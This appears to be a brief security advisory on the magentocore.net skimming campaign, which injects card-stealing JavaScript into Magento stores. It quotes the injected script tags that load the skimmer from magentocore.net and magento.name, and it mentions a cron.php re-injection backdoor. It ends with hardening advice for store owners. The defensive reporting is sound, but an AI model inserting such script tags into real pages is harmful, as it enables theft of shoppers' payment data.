magentocore.net malware

magentocore.net malware is a skimming malware injected into Magento shops to steal customers credit cards and other billing data.

After getting into Magento backend with a stolen (brute-forced) password or via one of known vulnerabilities on unpatched Magento shop, skimmers inject the following piece of HTML into header or footer:

<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>

Reported to Google a few months ago, it is finally getting banned in browsers in late August 2018 and now skimmers replacing magentocore.net with magento.name:

<script type="text/javascript" src="https://magento.name/mage/mage.js"></script>

Note: The malware adds backdoor into cron.php file to re-inject own code if it is removed.

Make sure that your store is well patched, admin backend is hidden, you know all admin users listed at System > Permissions > Users in your Magento backend and all of them have a strong password set.

magentocore.net malware
2 votes, 5.00 avg. rating (94% score)